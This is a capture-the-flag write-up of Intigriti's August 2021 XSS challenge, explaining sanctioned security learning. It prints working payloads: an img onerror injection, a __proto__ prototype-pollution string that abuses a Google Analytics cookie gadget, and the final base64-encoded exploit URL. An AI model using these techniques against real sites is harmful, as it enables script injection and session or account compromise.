Intigriti 0821-XSS Writeup

Piyush Paliwal
6 min readAug 21, 2021

--

by @WHOISbinit

INTRO

Hi I’m Piyush, This is my first writeup & challenge which I have successfully solved as I also have attempted many challenges before from Intigriti but the difficulty of these challenges were on next level for me always but looks like this time i did solve it and got a kick start with Intigriti.

Challenge Intro

As every month this month also Intigriti hosted the XSS challenge at https://challenge-0821.intigriti.io, and the tweet about it is https://twitter.com/intigriti/status/1427232148835258374.

As stated on the challenge’s page, we need to find a way to execute arbitrary JavaScript on the challenge page. However, there are a few rules:

Rules:*  Should work on the latest version of Firefox or Chrome
* Should execute alert(document.domain).
* Should leverage a cross site scripting vulnerability on this domain.
* Shouldn't be self-XSS or related to MiTM attacks
* Should be reported at go.intigriti.com/submit-solution

The rules are as usual: Need to find XSS but not self XSS.

Hints

These were the hints provided by Intigriti at every 100 likes on twitter, but this time hints were provided on discord.

TIP 1: The Google Analytics script was not just included for tracking all of you, it may or may not contain some useful gadget!

TIP 2: Wait, you’re telling me that deparam script hasn't been updated in 5 years? That can't be good!

We will discuss more about hints further.

Surfing the challenge

So i found two things while surfing the challenge

  1. When visiting the url the first thing anybody does is view the source code and viewing the source code reveals an iframe tag “https://challenge-0821.intigriti.io/challenge/cooking.html” which looks like our target.
  2. While surfing the challenge i also found an cookie containg the same username value as of the welcome title and changing it also change the welcome title (this looks interesting).

Exploring challenge/cooking.html

Viewing the source code for this page reveal some useful information like “The collection” header as some useful links which are base64 encoded and at the bottom we can see some javascript files that we will come back to it later.

For now lets see what those base64 encoded values hold for us:

Let’s open the first link which says “The basic XSS” and on the parallel side let’s also decode the base64 value of that link.

Click on the first link and the page fills up with some value like Recipe, Ingredients, Payload & Steps.

Now let’s check the base64 encoded value.

<li><a href="cooking.html?recipe=dGl0bGU9VGhlJTIwYmFzaWMlMjBYU1MmaW5ncmVkaWVudHMlNUIlNUQ9QSUyMHNjcmlwdCUyMHRhZyZpbmdyZWRpZW50cyU1QiU1RD1Tb21lJTIwamF2YXNjcmlwdCZwYXlsb2FkPSUzQ3NjcmlwdCUzRWFsZXJ0KDEpJTNDL3NjcmlwdCUzRSZzdGVwcyU1QiU1RD1GaW5kJTIwdGFyZ2V0JnN0ZXBzJTVCJTVEPUluamVjdCZzdGVwcyU1QiU1RD1FbmpveQ==">The basic XSS</a></li>

decoding the base64 gives something like this.

title=The%20basic%20XSS&ingredients%5B%5D=A%20script%20tag&ingredients%5B%5D=Some%20javascript&payload=%3Cscript%3Ealert(1)%3C/script%3E&steps%5B%5D=Find%20target&steps%5B%5D=Inject&steps%5B%5D=Enjoy

Further URL decode gives us a clear view

title=The basic XSS&ingredients[]=A script tag&ingredients[]=Some javascript&payload=<script>alert(1)</script>&steps[]=Find target&steps[]=Inject&steps[]=Enjoy

So looking at the base64 decoded value we can see that it holds the value related to Recipe, Ingredients, Payload & Steps. This looks interesting it means that if we modify the URL it might have impact on the webpage itself, but the question how it is extracting value from URL and displaying it on the webpage looks like some backend code is working. So now it’s time to read those three javascript file which we saw at the bottom of the source code.

Exploring main.js

In this file you will see there are four different types of functions but the main function here is “handleLoad” function which calls all the other 3 functions.

Before moving forward let’s simply understand what these 3 functions do:

Function readCookie :- As the name says this function reads value of cookie for the param provided as argument.

Function welcomeUser :- This function displays the welcome title on webpage with the value of username cookie.

Function generateRecipeText :- This is the function which takes those decoded base64 value from URL and print the Recipe, Ingredients, Payload & Steps to webpage.

Function handleLoad :- As said previously this is the main function and the first thing you can see it does is set a username variable from “readCookie” function and at next line it checks if the username variable is empty or not if it’s empty then it creates a new random cookie, Now in next line this is were our base64 encoded URL is decoded and converted in object now on next line the ga function is called which we will later discuss about, next we have the welcomeUser function with readCookie, next there is generateRecipeText function which take that recipe object as input and print values on webpage and at last log the recipe object to console.

There is also an eventListener at last which calls handleLoad function.

Now important things to note:

  1. The function welcomeUser is vulnerable to html injection as in the function you can see it’s changing the welcome title’s innerHTML not innerText as compared to generateRecipeText. So this means changing the cookie to something like below would make an alert popup.
<img src=x onerror=alert(document.domain)>

2. There are still two more things we need to talk about, one is the deparam function called in recipe variable and just below that the ga function these both function are imported from the other two javascript files which we saw below main.js file and these two function will help us achieve our XSS, how? let’s find out.

Exploit

So our main motive is to manipulate cookies, with param name = username and value = <img src=x onerror=alert(document.domain)>

Now you can see that deparam function is used in recipe variable and this function is used to create objects from string, array’s, etc. and in HINT 2 you can also see that intigrti is talking about deparam.

So it means that deparam function is useful to us, Now how it’s useful to us?

The Objects, as i just said that this script creates string to objects then the first thing that comes to mind related to objects attack is Prototype Pollution attack, now you might not have heard of it and it’s totally fine it takes experience to figure out anything but for now you can simply look at it as a bug which allow hackers to inject malicious properties in object, if you don’t understand anything don’t worry I will add some reference at bottom to learn more about this thing.

So we figured out that we need to do a Prototype Pollution attack, but what payload to use?

Like XSS, Prototype Pollution attack also have many payload regarding to type of vulnerability. So what type payload to look for? Here comes our HINT 1 to rescue “The Google Analytics script” in short our ga function.

So searching google about the prototype pollution attack with The Google Analytics script will lead you to this website https://github.com/BlackFan/client-side-prototype-pollution/blob/master//gadgets/google-analytics.md

and here you will find our payload

?__proto__[cookieName]=COOKIE%3DInjection%3B

Now you just need to remove the ‘?’ in front as we already have that before the recipe param and modify the payload.

__proto__[cookieName]=username%3D<img%20src%3dx%20onerror%3dalert(document.domain)>%3B

Now base64 encode the payload and use that payload in the url with recipe param.

X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEPGltZyUyMHNyYyUzZHglMjBvbmVycm9yJTNkYWxlcnQoZG9jdW1lbnQuZG9tYWluKT4lM0I=

Final Payload

https://challenge-0821.intigriti.io/challenge/cooking.html?recipe=X19wcm90b19fW2Nvb2tpZU5hbWVdPXVzZXJuYW1lJTNEPGltZyUyMHNyYyUzZHglMjBvbmVycm9yJTNkYWxlcnQoZG9jdW1lbnQuZG9tYWluKT4lM0I=

!!!XSS FIRED!!!

Some Reference for Prototype pollution:

https://www.youtube.com/watch?v=J3MIOIqvV8w

https://www.youtube.com/watch?v=Gv1nK6Wj8qM

Thanks for Reading.

--

--

No responses yet